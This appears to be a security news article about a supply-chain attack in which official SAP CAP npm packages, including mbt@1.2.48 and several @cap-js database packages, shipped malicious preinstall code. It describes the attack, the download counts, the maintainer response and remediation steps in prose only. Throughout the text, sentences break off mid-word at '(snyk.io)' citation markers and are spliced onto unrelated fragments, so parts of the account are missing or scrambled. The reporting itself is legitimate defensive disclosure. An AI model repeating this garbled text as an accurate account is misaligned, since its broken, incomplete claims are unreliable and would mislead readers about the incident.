Feross warns SAP CAP npm compromise

This is a software supply-chain attack — the nasty kind where nothing looks wrong until your own build tools do the attacker’s work for them. The immediate problem is not a bug in an SAP app. It is that official npm packages used in SAP’s CAP toolchain were published with malicious install-time code on April 29, 2026. Feross Aboukhadijeh pushed the warning into the o(snyk.io)ions, secrets may already have walked out the door. (snyk.io)elopment stack were confirmed compromised: `mbt@1.2.48`, `@cap-js/db-service@2.10.1`, `@cap-js/sqlite@2.2.2`, and `@cap-js/postgres@2.2.2`. Those are not random side packages. `mbt` is SAP’s Cloud MTA Build Tool, and the `@cap-js/*` packages are database services inside CAP apps. (snyk.io) ### Why do those packages matter so much? Because they sit in exactly the places you do not want surprise code execution — local developer setup, dep(snyk.io)MBT the default and recommended build tool in SAP Business Application Studio, and it is also installable through npm. That means a poisoned release can land in both laptops and automated pipelines. (help.sap.com)code do? The compromised versions added a `preinstall` hook. That hook downloaded the Bun JavaScript runtime from GitHub Releases, unpacked it, and used it to run an obfuscated payload of roughly 11.6 MB. Socket says the script also followed redirects without validating the destination and used PowerShell with execution-policy bypass on Windows — basically the opposite of what you want in a trusted package installer. (snyk.io)ls and cloud secrets, then used compromised GitHub accounts to create public “dead-drop” repositories tagged with the phrase “A Mini Shai-Hulud has Appeared.” That weird string matters because it gave defenders a visible marker that infected machines were already beaconing out in the wild. (snyk.io) ### How broad could the blast radius be? Potentially pretty wide. Snyk’s(snyk.io) 250,000 for `@cap-js/sqlite`, 52,000 for `mbt`, and 10,000 for `@cap-js/postgres`. Download counts are not victim counts, obviously, but they tell you these are central packages, not obscure experiments. (snyk.io) ### Did maintainers respond? Yes — and fast. The disclosure issue in the CAP database-services repo shows a maintainer acknowledging(snyk.io)cement releases for the CAP packages were published later the same day, after the malicious versions appeared in a tight window on April 29. (github.com) ### What should teams do right now? Assume install-time exposure until proven otherwise. Check lockfiles and artifact caches for the exact bad versions, review (snyk.io)y have been present on affected developer boxes or runners. Also block those versions explicitly so rebuilds do not pull them back in. Those steps are an inference from the attack path, but they line up with the guidance security researchers are giving because the compromise targeted install and build environments directly. (socket.dev)ne The scary part is not just “npm package went bad.” It is where these packages live — inside SAP development and deployment plumbing. When the build tool is the thing that gets poisoned, the attack surface jumps from one app to every secret the pipeline can reach. (socket.dev)